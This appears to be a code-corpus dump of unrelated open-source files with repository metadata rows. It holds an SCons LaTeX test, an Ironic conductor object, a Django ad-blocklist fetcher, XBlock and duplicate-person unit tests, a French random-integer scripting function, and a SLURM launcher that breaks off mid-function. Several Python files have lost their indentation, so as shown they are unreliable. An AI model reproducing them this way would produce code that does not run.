# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "test/DVIPDF/makeindex.py rel_2.5.1:3735:9dc6cee5c168 2016/11/03 14:02:02 bdbaddog"
import TestSCons
test = TestSCons.TestSCons()
dvipdf = test.where_is('dvipdf')
if not dvipdf:
test.skip_test('Could not find dvipdf; skipping test(s).\n')
tex = test.where_is('tex')
if not tex:
test.skip_test('Could not find tex; skipping test(s).\n')
latex = test.where_is('latex')
if not latex:
test.skip_test('Could not find latex; skipping test(s).\n')
test.write('SConstruct', """
import os
env = Environment(ENV = { 'PATH' : os.environ['PATH'] })
dvipdf = env.Dictionary('DVIPDF')
env.PDF(target = 'foo.pdf',
source = env.DVI(target = 'foo.dvi', source = 'foo.tex'))
""")
test.write('foo.tex', r"""
\documentclass{article}
\usepackage{makeidx}
\makeindex
\begin{document}
\section{Test 1}
I would like to \index{index} this.
\section{test 2}
I'll index \index{this} as well.
\printindex
\end{document}
""")
test.run(arguments = 'foo.pdf', stderr = None)
test.must_exist(test.workpath('foo.pdf'))
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| mit | -5,945,060,233,082,140,000 | 26.416667 | 98 | 0.723404 | false |
varunarya10/ironic | ironic/objects/conductor.py | 2 | 2328 | # coding=utf-8
#
# Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from ironic.db import api as db_api
from ironic.objects import base
from ironic.objects import utils
class Conductor(base.IronicObject):
dbapi = db_api.get_instance()
fields = {
'id': int,
'drivers': utils.list_or_none,
'hostname': str,
}
@staticmethod
def _from_db_object(conductor, db_obj):
"""Converts a database entity to a formal object."""
for field in conductor.fields:
conductor[field] = db_obj[field]
conductor.obj_reset_changes()
return conductor
@base.remotable_classmethod
def get_by_hostname(cls, context, hostname):
"""Get a Conductor record by its hostname.
:param hostname: the hostname on which a Conductor is running
:returns: a :class:`Conductor` object.
"""
db_obj = cls.dbapi.get_conductor(hostname)
return Conductor._from_db_object(cls(), db_obj)
def save(self, context):
"""Save is not supported by Conductor objects."""
raise NotImplementedError(
_('Cannot update a conductor record directly.'))
@base.remotable
def refresh(self, context):
current = self.__class__.get_by_hostname(context,
hostname=self.hostname)
for field in self.fields:
if (hasattr(self, base.get_attrname(field)) and
self[field] != current[field]):
self[field] = current[field]
@base.remotable
def touch(self, context):
"""Touch this conductor's DB record, marking it as up-to-date."""
self.dbapi.touch_conductor(self.hostname)
| apache-2.0 | -5,147,548,087,885,553,000 | 33.235294 | 78 | 0.631014 | false |
ragibkl/blackhole | website/named/models.py | 1 | 1529 | from django.db import models
from django.template import loader
import requests
class AdSource(models.Model):
name = models.CharField(max_length=10)
get_url = models.URLField()
def fetch_ad_domains(self):
url = self.get_url
response = requests.get(url)
if response.status_code == 200:
response_list = str(response.content, 'UTF-8')\
.replace('\r','').split('\n')
ad_list = []
for line in response_list:
a = line.replace('\t', ' ').split(' ')
if a[0] != '#' and a[0] in ['0.0.0.0', '127.0.0.1'] and a[1] not in ('', 'localhost') and a[1][-1] != '.':
ad_list.append(a[1].lower())
elif len(a) > 1 and len(a[1]) > 1 and a[1][-1] == '.':
print('Rejected : {}'.format(line))
ad_domains = self.ad_domains.all()
for ad_domain in ad_domains:
ad_domain.delete()
for ad_domain in ad_list:
print(ad_domain)
self.ad_domains.create(domain=ad_domain)
class AdDomain(models.Model):
domain = models.CharField(max_length=100)
source = models.ForeignKey(AdSource, related_name='ad_domains')
@classmethod
def get_ad_blacklist(cls):
ad_list = cls.objects.values('domain').distinct()
string = loader.render_to_string('named/badlist.txt', {
'blackhole': 'dns1.bancuh.com',
'ad_list': ad_list
})
return string
| gpl-3.0 | -9,100,672,480,641,761,000 | 31.531915 | 122 | 0.53172 | false |
open-craft/xblock-group-project-v2 | tests/unit/test_stage_components.py | 1 | 24794 | import json
import os
from datetime import datetime
from unittest import TestCase
from xml.etree import ElementTree
import ddt
import mock
import pytz
from freezegun import freeze_time
from xblock.field_data import DictFieldData
from xblock.fields import ScopeIds
from xblock.runtime import Runtime
from xblock.validation import ValidationMessage
from group_project_v2 import messages
from group_project_v2.group_project import GroupActivityXBlock
from group_project_v2.project_api import TypedProjectAPI
from group_project_v2.project_api.dtos import WorkgroupDetails
from group_project_v2.project_navigator import ProjectNavigatorViewXBlockBase
from group_project_v2.stage import BaseGroupActivityStage
from group_project_v2.stage_components import (
GroupProjectGradeEvaluationDisplayXBlock,
GroupProjectReviewQuestionXBlock,
GroupProjectSubmissionXBlock,
GroupProjectTeamEvaluationDisplayXBlock,
StaticContentBaseXBlock,
)
from group_project_v2.upload_file import UploadFile
from tests.utils import TestWithPatchesMixin, make_api_error, make_question
from tests.utils import make_review_item as mri
class StageComponentXBlockTestBase(TestCase, TestWithPatchesMixin):
block_to_test = None
def setUp(self):
super(StageComponentXBlockTestBase, self).setUp()
services_mocks = {
"i18n": mock.Mock(ugettext=lambda string: string),
"notifications": mock.Mock()
}
self.runtime_mock = mock.create_autospec(Runtime)
self.runtime_mock.service = lambda _, service_id: services_mocks.get(service_id)
self.stage_mock = mock.create_autospec(BaseGroupActivityStage)
# pylint: disable=not-callable
self.block = self.block_to_test(self.runtime_mock, field_data=DictFieldData({}), scope_ids=mock.Mock())
self.make_patch(self.block_to_test, 'stage', mock.PropertyMock(return_value=self.stage_mock))
def _assert_empty_fragment(self, fragment): # pylint: disable=no-self-use
self.assertEqual(fragment.content, u'')
self.assertEqual(fragment.resources, [])
class TestableStaticContentXBlock(StaticContentBaseXBlock):
TARGET_PROJECT_NAVIGATOR_VIEW = 'some-pn-view'
TEXT_TEMPLATE = u"Static content for {activity_name}"
@ddt.ddt
class TestStaticContentBaseXBlockMixin(StageComponentXBlockTestBase):
block_to_test = TestableStaticContentXBlock
def _set_up_navigator(self, activity_name='Activity 1'):
stage = self.stage_mock
activity = mock.create_autospec(GroupActivityXBlock)
activity.display_name = activity_name
stage.activity = activity
nav = mock.Mock()
stage.activity.project.navigator = nav
return nav
def test_student_view_no_path_to_navigator(self):
self.stage_mock = None
self._assert_empty_fragment(self.block.student_view({}))
self.stage_mock = mock.create_autospec(BaseGroupActivityStage)
stage = self.stage_mock
stage.activity = None
self._assert_empty_fragment(self.block.student_view({}))
stage.activity = mock.Mock()
stage.activity.project = None
self._assert_empty_fragment(self.block.student_view({}))
stage.activity.project = mock.Mock()
stage.activity.project.navigator = None
self._assert_empty_fragment(self.block.student_view({}))
def test_student_view_no_target_block(self):
navigator_mock = self._set_up_navigator()
navigator_mock.get_child_of_category = mock.Mock(return_value=None)
self._assert_empty_fragment(self.block.student_view({}))
navigator_mock.get_child_of_category.assert_called_once_with(self.block.TARGET_PROJECT_NAVIGATOR_VIEW)
@ddt.data(
({'additional': 'context'}, u"Rendered content", "activity 1"),
({'other': 'additional'}, u"Other content", "Activity 2"),
)
@ddt.unpack
def test_student_view_normal(self, additional_context, content, activity_name):
target_block = mock.Mock(spec=ProjectNavigatorViewXBlockBase)
target_block.icon = "I'm icon"
target_block.scope_ids = mock.create_autospec(spec=ScopeIds)
navigator_mock = self._set_up_navigator(activity_name)
navigator_mock.get_child_of_category.return_value = target_block
with mock.patch('group_project_v2.stage_components.loader.render_template') as patched_render_template, \
mock.patch('group_project_v2.stage_components.get_link_to_block') as patched_get_link_to_block:
patched_render_template.return_value = content
patched_get_link_to_block.return_value = "some link"
expected_context = {
'block': self.block,
'block_link': 'some link',
'block_text': TestableStaticContentXBlock.TEXT_TEMPLATE.format(activity_name=activity_name),
'target_block_id': str(target_block.scope_ids.usage_id),
'view_icon': target_block.icon
}
expected_context.update(additional_context)
fragment = self.block.student_view(additional_context)
self.assertEqual(fragment.content, content)
patched_get_link_to_block.assert_called_once_with(target_block)
patched_render_template.assert_called_once_with(StaticContentBaseXBlock.TEMPLATE_PATH, expected_context)
@ddt.ddt
class TestGroupProjectSubmissionXBlock(StageComponentXBlockTestBase):
block_to_test = GroupProjectSubmissionXBlock
group_id = 152
user_id = "student_1"
course_id = "a course"
def _make_file(self): # pylint:disable=no-self-use
return open(os.path.join(os.path.split(__file__)[0], "../resources/", 'image.png'), 'rb')
def setUp(self):
super(TestGroupProjectSubmissionXBlock, self).setUp()
self.project_api_mock = mock.create_autospec(TypedProjectAPI)
self.make_patch(self.block_to_test, 'project_api', mock.PropertyMock(return_value=self.project_api_mock))
user_details = mock.Mock(user_label='Test label')
self.block_to_test.project_api.get_user_details = mock.Mock(
spec=TypedProjectAPI.get_user_details, return_value=user_details
)
self.project_api_mock.get_latest_workgroup_submissions_by_id = mock.Mock(return_value={})
self.stage_mock.available_now = True
self.stage_mock.activity = mock.Mock()
self.stage_mock.activity.user_id = self.user_id
self.stage_mock.activity.workgroup = WorkgroupDetails(id=self.group_id)
self.stage_mock.activity.course_id = self.course_id
@ddt.data(1, 'qwe', 'upload 1')
def test_upload(self, upload_id):
upload_datetime = datetime(2015, 11, 19, 22, 54, 13, tzinfo=pytz.UTC)
self.block.upload_id = upload_id
self.project_api_mock.get_latest_workgroup_submissions_by_id.return_value = {
upload_id: {
"document_url": 'https://dummy.s3.amazonaws.com/1/123123123/some_filename',
"document_filename": 'some_filename',
"modified": upload_datetime.strftime('%Y-%m-%dT%H:%M:%SZ'),
"user_details": {"id": 1, "name": 'qwe'}
}
}
with mock.patch('group_project_v2.stage_components.format_date') as patched_format_date:
patched_format_date.return_value = "Aug 22"
upload = self.block.upload
self.project_api_mock.get_latest_workgroup_submissions_by_id.assert_called_once_with(self.group_id)
patched_format_date.assert_called_once_with(upload_datetime)
self.assertEqual(upload.location, 'https://dummy.s3.amazonaws.com/1/123123123/some_filename')
self.assertEqual(upload.file_name, 'some_filename')
self.assertEqual(upload.submission_date, 'Aug 22')
self.assertEqual(upload.user_details, {"id": 1, "name": 'qwe'})
def test_no_upload(self):
self.block.upload_id = 150
self.project_api_mock.get_latest_workgroup_submissions_by_id.return_value = {1: {}, 2: {}}
self.assertIsNone(self.block.upload)
def test_upload_submission_stage_is_not_available(self):
self.stage_mock.available_now = False
self.stage_mock.STAGE_ACTION = 'something'
response = self.block.upload_submission(mock.Mock())
self.assertEqual(response.status_code, 422)
def test_upload_submission_stage_is_not_group_member(self):
self.stage_mock.is_group_member = False
self.stage_mock.is_admin_grader = False
response = self.block.upload_submission(mock.Mock())
self.assertEqual(response.status_code, 403)
@ddt.data(
(Exception("exception message"), 500),
(make_api_error(418, "other message"), 418),
(make_api_error(401, "yet another message"), 401),
)
@ddt.unpack
def test_upload_submission_persist_and_submit_file_raises(self, exception, expected_code):
upload_id = "upload_id"
request_mock = mock.Mock()
request_mock.params = {upload_id: mock.Mock()}
request_mock.params[upload_id].file = self._make_file()
self.block.upload_id = upload_id
with mock.patch.object(self.block, 'persist_and_submit_file') as patched_persist_and_submit_file:
patched_persist_and_submit_file.side_effect = exception
response = self.block.upload_submission(request_mock)
self.assertEqual(response.status_code, expected_code)
response_body = json.loads(response.text)
self.assertEqual(response_body['title'], messages.FAILED_UPLOAD_TITLE)
self.assertEqual(
response_body['message'],
messages.FAILED_UPLOAD_MESSAGE_TPL.format(error_goes_here=str(exception))
)
@ddt.data(
("sub1", "file.html", "new_stage_state1", False),
("sub2", "other_file.so", {"activity_id": 'A1', "stage_id": 'S1', 'state': 'complete'}, False),
("sub1", "file_ta.so", {"activity_id": 'A1', "stage_id": 'S1', 'state': 'complete'}, True),
("sub2", "other_file_ta.so", {"activity_id": 'A1', "stage_id": 'S1', 'state': 'complete'}, True),
)
@ddt.unpack
@freeze_time("2015-08-01")
def test_upload_submission_success_scenario(self, submission_id, file_url, stage_state, is_admin_grader):
upload_id = "upload_id"
self.stage_mock.is_admin_grader = is_admin_grader
self.stage_mock.is_group_member = not is_admin_grader
request_mock = mock.Mock()
request_mock.params = {upload_id: mock.Mock()}
uploaded_file = self._make_file()
request_mock.params[upload_id].file = uploaded_file
self.block.upload_id = upload_id
self.stage_mock.get_new_stage_state_data = mock.Mock(return_value=stage_state)
self.stage_mock.check_submissions_and_mark_complete = mock.Mock()
expected_context = {
"user_id": self.user_id,
"group_id": self.group_id,
"project_api": self.project_api_mock,
"course_id": self.course_id
}
with mock.patch.object(self.block, 'persist_and_submit_file') as patched_persist_and_submit_file:
uploaded_file_mock = mock.Mock()
uploaded_file_mock.submission_id = submission_id
uploaded_file_mock.file_url = file_url
patched_persist_and_submit_file.return_value = uploaded_file_mock
response = self.block.upload_submission(request_mock)
self.assertEqual(response.status_code, 200)
response_payload = json.loads(response.text)
self.assertEqual(response_payload['title'], messages.SUCCESSFUL_UPLOAD_TITLE)
self.assertEqual(response_payload["submissions"], {submission_id: file_url})
self.assertEqual(response_payload["new_stage_states"], [stage_state])
self.assertEqual(response_payload["user_label"], 'Test label')
self.assertEqual(response_payload["submission_date"], 'Aug 01')
self.stage_mock.check_submissions_and_mark_complete.assert_called_once_with()
patched_persist_and_submit_file.assert_called_once_with(
self.stage_mock.activity, expected_context, uploaded_file
)
def test_persist_and_submit_file_propagates_exceptions(self):
context_mock = mock.Mock()
uploaded_file = self._make_file()
with mock.patch('group_project_v2.stage_components.UploadFile') as upload_file_class_mock:
upload_file_mock = mock.create_autospec(UploadFile)
upload_file_mock.save_file = mock.Mock(side_effect=Exception("some error"))
upload_file_mock.file = mock.Mock()
upload_file_mock.file.name = 'file_name'
upload_file_class_mock.return_value = upload_file_mock
with self.assertRaises(Exception) as raises_cm:
self.block.persist_and_submit_file(self.stage_mock.activity, context_mock, uploaded_file)
exception = raises_cm.exception
expected_message = "Error storing file {} - {}".format(upload_file_mock.file.name, "some error")
self.assertEqual(exception.message, expected_message)
upload_file_mock.save_file.side_effect = lambda: 1
upload_file_mock.submit = mock.Mock(side_effect=Exception("other error"))
with self.assertRaises(Exception) as raises_cm:
self.block.persist_and_submit_file(self.stage_mock.activity, context_mock, uploaded_file)
exception = raises_cm.exception
expected_message = "Error recording file information {} - {}".format(
upload_file_mock.file.name, "other error"
)
self.assertEqual(exception.message, expected_message)
@ddt.data(1, "upload 12", "iddqd")
def test_persist_and_submit_file_success_path(self, upload_id):
self.block.upload_id = upload_id
self.stage_mock.activity.content_id = 'content_id 12'
self.stage_mock.fire_file_upload_notification = mock.Mock()
context_mock = mock.Mock()
uploaded_file = self._make_file()
self.runtime_mock.publish = mock.Mock()
with mock.patch('group_project_v2.stage_components.UploadFile') as upload_file_class_mock:
upload_file_mock = mock.create_autospec(UploadFile)
upload_file_mock.submission_id = '12345'
upload_file_mock.file = mock.Mock()
upload_file_mock.file.name = 'file_name'
upload_file_class_mock.return_value = upload_file_mock
result = self.block.persist_and_submit_file(self.stage_mock.activity, context_mock, uploaded_file)
self.assertEqual(result, upload_file_mock)
upload_file_class_mock.assert_called_once_with(uploaded_file, upload_id, context_mock)
upload_file_mock.save_file.assert_called_once_with()
upload_file_mock.submit.assert_called_once_with()
self.runtime_mock.publish.assert_called_once_with(
self.block,
self.block_to_test.SUBMISSION_RECEIVED_EVENT,
{
"submission_id": '12345',
"filename": 'file_name',
"content_id": 'content_id 12',
"group_id": self.group_id,
"user_id": self.user_id,
}
)
self.stage_mock.fire_file_upload_notification.assert_called_with(
self.runtime_mock.service(self, 'notifications')
)
@ddt.ddt
class TestGroupProjectReviewQuestionXBlock(StageComponentXBlockTestBase):
block_to_test = GroupProjectReviewQuestionXBlock
def test_render_content_bad_content(self):
self.block.question_content = "imparsable as XML"
self.assertEqual(self.block.render_content(), "")
@ddt.data(
("<input type='text'/>", False, False, {'answer', 'editable'}),
("<textarea class='initial_class'/>", False, False, {'answer', 'editable', 'initial_class'}),
("<input type='text'/>", True, False, {'answer', 'editable', 'side'}),
("<input type='text'/>", False, True, {'answer'}),
)
@ddt.unpack
def test_render_content_node_content(self, question_content, single_line, closed, expected_classes):
self.block.question_content = question_content
self.block.single_line = single_line
self.stage_mock.is_closed = closed
with mock.patch('group_project_v2.stage_components.outer_html') as patched_outer_html:
expected_response = "some rendered content"
patched_outer_html.return_value = expected_response
response = self.block.render_content()
self.assertEqual(response, expected_response)
self.assertEqual(len(patched_outer_html.call_args_list), 1) # essentially "called once with any attributes"
call_args, call_kwargs = patched_outer_html.call_args
self.assertEqual(call_kwargs, {})
self.assertEqual(len(call_args), 1)
node_to_render = call_args[0]
self.assertIsInstance(node_to_render, ElementTree.Element)
self.assertEqual(node_to_render.get('id'), self.block.question_id)
self.assertEqual(node_to_render.get('name'), self.block.question_id)
self.assertEqual(set(node_to_render.get('class').split(' ')), expected_classes)
self.assertEqual(node_to_render.get('disabled', None), 'disabled' if closed else None)
class CommonFeedbackDisplayStageTests(object):
def setUp(self):
super(CommonFeedbackDisplayStageTests, self).setUp()
self.activity_mock = mock.create_autospec(GroupActivityXBlock)
self.stage_mock.activity = self.activity_mock
self.project_api_mock = mock.Mock(spec=TypedProjectAPI)
self.make_patch(self.block_to_test, 'project_api', mock.PropertyMock(return_value=self.project_api_mock))
self.block.question_id = "q1"
@staticmethod
def _print_messages(validation):
for message in validation.messages:
print(message.text)
def test_validate_no_question_id_sets_error_message(self):
self.block.question_id = None
try:
validation = self.block.validate()
self.assertEqual(len(validation.messages), 1)
self.assertEqual(validation.messages[0].type, ValidationMessage.ERROR)
self.assertEqual(validation.messages[0].text, self.block.NO_QUESTION_SELECTED)
except AssertionError:
print(self._print_messages(validation))
raise
def test_validate_question_not_found_sets_error_message(self):
with mock.patch.object(self.block_to_test, 'question', mock.PropertyMock(return_value=None)):
try:
validation = self.block.validate()
self.assertEqual(len(validation.messages), 1)
self.assertEqual(validation.messages[0].type, ValidationMessage.ERROR)
self.assertEqual(validation.messages[0].text, self.block.QUESTION_NOT_FOUND)
except AssertionError:
print(self._print_messages(validation))
raise
def test_has_question_passes_validation(self):
question_mock = mock.create_autospec(GroupProjectReviewQuestionXBlock)
with mock.patch.object(self.block_to_test, 'question', mock.PropertyMock(return_value=question_mock)):
try:
validation = self.block.validate()
self.assertEqual(len(validation.messages), 0)
except AssertionError:
print(self._print_messages(validation))
raise
def test_question_property_no_questions(self):
with mock.patch.object(self.block_to_test, 'activity_questions', mock.PropertyMock(return_value=[])):
self.assertIsNone(self.block.question)
def test_question_property_no_matching_questions(self):
self.block.question_id = 'q1'
questions = [make_question('123', '123'), make_question('456', '456')]
with mock.patch.object(self.block_to_test, 'activity_questions', mock.PropertyMock(return_value=questions)):
self.assertIsNone(self.block.question)
def test_question_property_one_matching_question(self):
self.block.question_id = '456'
questions = [make_question('123', '123'), make_question('456', '456')]
with mock.patch.object(self.block_to_test, 'activity_questions', mock.PropertyMock(return_value=questions)):
self.assertEqual(self.block.question, questions[1])
def test_question_property_multiple_matching_questions(self):
self.block.question_id = '123'
questions = [make_question('123', '123'), make_question('123', '123')]
with mock.patch.object(self.block_to_test, 'activity_questions', mock.PropertyMock(return_value=questions)), \
self.assertRaises(ValueError):
_ = self.block.question # pylint:disable=invalid-name
def test_question_ids_values_provider(self):
questions = [make_question('123', 'Title 1'), make_question('456', 'Title 2'), make_question('789', 'Title 3')]
with mock.patch.object(self.block_to_test, 'activity_questions', mock.PropertyMock(return_value=questions)):
values = self.block.question_ids_values_provider()
self.assertEqual(values, [
{'display_name': u'--- Not selected ---', 'value': None},
{"display_name": 'Title 1', "value": '123'},
{"display_name": 'Title 2', "value": '456'},
{"display_name": 'Title 3', "value": '789'}
])
@ddt.ddt
class TestGroupProjectTeamEvaluationDisplayXBlock(CommonFeedbackDisplayStageTests, StageComponentXBlockTestBase):
block_to_test = GroupProjectTeamEvaluationDisplayXBlock
# pylint: disable=too-many-arguments
@ddt.data(
(1, 2, 'content-1', 'q1', [mri(1, "q1"), mri(2, "q1")], [mri(1, "q1"), mri(2, "q1")]),
(3, 9, 'content-2', 'q2', [mri(1, "q1"), mri(2, "q1")], []),
(7, 15, 'content-3', 'q1', [mri(1, "q1"), mri(1, "q2")], [mri(1, "q1")]),
(7, 15, 'content-3', 'q2', [mri(1, "q1"), mri(1, "q2")], [mri(1, "q2")]),
)
@ddt.unpack
def test_get_feedback(self, user_id, group_id, content_id, question_id, feedback_items, expected_result):
self.project_api_mock.get_user_peer_review_items = mock.Mock(return_value=feedback_items)
self.stage_mock.activity_content_id = content_id
self.block.question_id = question_id
with mock.patch.object(self.block_to_test, 'user_id', mock.PropertyMock(return_value=user_id)), \
mock.patch.object(self.block_to_test, 'group_id', mock.PropertyMock(return_value=group_id)):
result = self.block.get_feedback()
self.project_api_mock.get_user_peer_review_items.assert_called_once_with(
user_id, group_id, content_id
)
self.assertEqual(result, expected_result)
def test_activity_questions(self):
self.activity_mock.team_evaluation_questions = [1, 2, 3]
self.activity_mock.peer_review_questions = [4, 5, 6]
self.assertEqual(self.block.activity_questions, [1, 2, 3])
@ddt.ddt
class TestGroupProjectGradeEvaluationDisplayXBlock(CommonFeedbackDisplayStageTests, StageComponentXBlockTestBase):
block_to_test = GroupProjectGradeEvaluationDisplayXBlock
@ddt.data(
(2, 'content-1', 'q1', [mri(1, "q1"), mri(2, "q1")], [mri(1, "q1"), mri(2, "q1")]),
(9, 'content-2', 'q2', [mri(1, "q1"), mri(2, "q1")], []),
(15, 'content-3', 'q1', [mri(1, "q1"), mri(1, "q2")], [mri(1, "q1")]),
(15, 'content-3', 'q2', [mri(1, "q1"), mri(1, "q2")], [mri(1, "q2")]),
)
@ddt.unpack
def test_get_feedback(self, group_id, content_id, question_id, feedback_items, expected_result):
self.project_api_mock.get_workgroup_review_items_for_group = mock.Mock(return_value=feedback_items)
self.stage_mock.activity_content_id = content_id
self.block.question_id = question_id
with mock.patch.object(self.block_to_test, 'group_id', mock.PropertyMock(return_value=group_id)):
result = self.block.get_feedback()
self.project_api_mock.get_workgroup_review_items_for_group.assert_called_once_with(group_id, content_id)
self.assertEqual(result, expected_result)
def test_activity_questions(self):
self.activity_mock.team_evaluation_questions = [1, 2, 3]
self.activity_mock.peer_review_questions = [4, 5, 6]
self.assertEqual(self.block.activity_questions, [4, 5, 6])
| agpl-3.0 | -2,898,909,224,324,588,000 | 45.257463 | 120 | 0.64681 | false |
DemocracyClub/yournextrepresentative | ynr/apps/duplicates/tests/test_models.py | 1 | 3194 | from django.db import IntegrityError
from django.test import TestCase
from candidates.tests.auth import TestUserMixin
from duplicates.models import DuplicateSuggestion
from people.tests.factories import PersonFactory
class TestDuplicateSuggestion(TestUserMixin, TestCase):
def setUp(self):
self.people = PersonFactory.create_batch(10)
self.person_1 = self.people[0]
self.person_2 = self.people[1]
def test_queryset_finds_bidirectional_duplicates(self):
"""
Test that the `for_person` queryset finds duplicates in each direction.
"""
DuplicateSuggestion.objects.create(
person=self.person_1, other_person=self.person_2, user=self.user
)
self.assertEqual(
DuplicateSuggestion.objects.for_person(self.person_1).count(), 1
)
self.assertEqual(
DuplicateSuggestion.objects.for_person(self.person_2).count(), 1
)
def test_mark_as_not_duplicate(self):
DuplicateSuggestion.objects.create(
person=self.person_1,
other_person=self.person_2,
user=self.user,
status=DuplicateSuggestion.STATUS.not_duplicate,
)
self.assertEqual(DuplicateSuggestion.not_duplicate.all().count(), 1)
self.assertTrue(
DuplicateSuggestion.objects.marked_as_not_duplicate(
self.person_1, self.person_2
)
)
self.assertTrue(
DuplicateSuggestion.objects.marked_as_not_duplicate(
self.person_2, self.person_1
)
)
def test_not_duplicate_duplicates_create_method(self):
"""
Make sure we can't make a duplicate duplicate suggestion using create()
"""
DuplicateSuggestion.objects.create(
person=self.person_1,
other_person=self.person_2,
user=self.user,
status=DuplicateSuggestion.STATUS.not_duplicate,
)
with self.assertRaises(IntegrityError):
DuplicateSuggestion.objects.create(
person=self.person_2,
other_person=self.person_1,
user=self.user,
status=DuplicateSuggestion.STATUS.not_duplicate,
)
def test_not_duplicate_duplicates_upsert(self):
DuplicateSuggestion.objects.create(
person=self.person_1,
other_person=self.person_2,
user=self.user,
status=DuplicateSuggestion.STATUS.not_duplicate,
)
self.assertEqual(DuplicateSuggestion.objects.count(), 1)
DuplicateSuggestion.objects.update_or_create(
person=self.person_2,
other_person=self.person_1,
user=self.user,
status=DuplicateSuggestion.STATUS.not_duplicate,
)
self.assertEqual(DuplicateSuggestion.objects.count(), 1)
DuplicateSuggestion.objects.get_or_create(
person=self.person_2,
other_person=self.person_1,
user=self.user,
status=DuplicateSuggestion.STATUS.not_duplicate,
)
self.assertEqual(DuplicateSuggestion.objects.count(), 1)
| agpl-3.0 | -2,256,743,429,866,708,500 | 34.488889 | 79 | 0.622104 | false |
vlegoff/tsunami | src/primaires/scripting/fonctions/ent_alea.py | 1 | 2666 | # -*-coding:Utf-8 -*
# Copyright (c) 2010-2017 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Fichier contenant la fonction ent_alea."""
from random import randint, random, choice
from fractions import Fraction
from primaires.scripting.fonction import Fonction
class ClasseFonction(Fonction):
"""Retourne un entier aléatoire."""
@classmethod
def init_types(cls):
cls.ajouter_types(cls.ent_alea, "Fraction")
cls.ajouter_types(cls.ent_alea_pond, "Fraction", "Fraction")
@staticmethod
def ent_alea(max):
"""Retourne un entier aléatoire entre 1 et la valeur maximale précisée.
"""
return Fraction(randint(1, int(max)))
@staticmethod
def ent_alea_pond(max, pond):
"""Retourne un entier aléatoire entre 1 et la valeur maximale,
pondéré par la valeur précisée en deuxième argument.
Cette fonction est utile pour calculer des dégâts en fonction
d'un talent d'un personnage.
"""
seq = []
for i in range(100):
for x in range(100 - abs(i - int(pond))):
seq.append(i)
return Fraction(choice(seq))
| bsd-3-clause | -5,764,540,807,305,007,000 | 39.212121 | 79 | 0.717408 | false |
vladfi1/phillip | launch_many.py | 1 | 3579 | #!/usr/bin/env python
import os
import sys
from argparse import ArgumentParser
import subprocess
from phillip import util
import json
from launch_lib import add_options, launch
parser = ArgumentParser()
parser.add_argument('path', type=str, help="path to enemies file")
add_options(parser)
args = parser.parse_args()
run_trainer_b = True
run_agents_b = True
if args.disk or args.play:
run_trainer_b = False
if args.dry_run:
print("NOT starting jobs:")
else:
print("Starting jobs:")
if not os.path.exists("slurm_logs"):
os.makedirs("slurm_logs")
if not os.path.exists("slurm_scripts"):
os.makedirs("slurm_scripts")
pids = []
with open(args.path) as f:
agent_paths = json.load(f)
agent_paths = ['agents/' + e for e in agent_paths]
def get_agents(path):
params = util.load_params(path)
pop_size = params.get('pop_size')
if pop_size and args.pop_size:
pop_size = min(pop_size, args.pop_size)
if pop_size:
pop_ids = range(pop_size)
else:
pop_ids = [-1]
return [(path, params, pop_id) for pop_id in pop_ids]
agents = []
for agent_list in map(get_agents, agent_paths):
agents.extend(agent_list)
trainer_ids = []
def run_trainer(path, params, pop_id):
name = "trainer_" + params['name']
command = "python3 -u phillip/train.py --load " + path
command += " --dump " + ("lo" if args.local else "ib0")
command += " --send %d" % args.send
if args.init:
command += " --init"
if pop_id >= 0:
name += "_%d" % pop_id
command += " --pop_id %d" % pop_id
if args.pop_size:
command += " --pop_size %d" % min(args.pop_size, params['pop_size'])
trainer_id = launch(
args, name, command,
gpu=not args.cpu,
qos='tenenbaum' if args.tenenbaum else None,
mem=16,
pids=pids,
)
if trainer_id:
trainer_ids.append(trainer_id)
trainer_depends = None
if run_trainer_b:
for agent_args in agents:
run_trainer(*agent_args)
if trainer_ids:
trainer_depends = ":".join(trainer_ids)
enemy_commands = []
for enemy_path, _, enemy_id in agents:
enemy_command = " --enemy %s" % enemy_path
if enemy_id >= 0:
enemy_command += " --enemy_id %d" % enemy_id
enemy_commands.append(enemy_command)
def run_agents(path, params, pop_id):
actors = args.agents or params.get('agents', 1)
print("Using %d actors" % actors)
actors_per_enemy = actors // len(agents)
common_command = "python3 -u phillip/run.py --load " + path
if args.disk:
common_command += " --disk 1"
else:
common_command += " --dump 1"
if run_trainer_b:
if args.local:
common_command += " --trainer_ip 127.0.0.1"
if args.local:
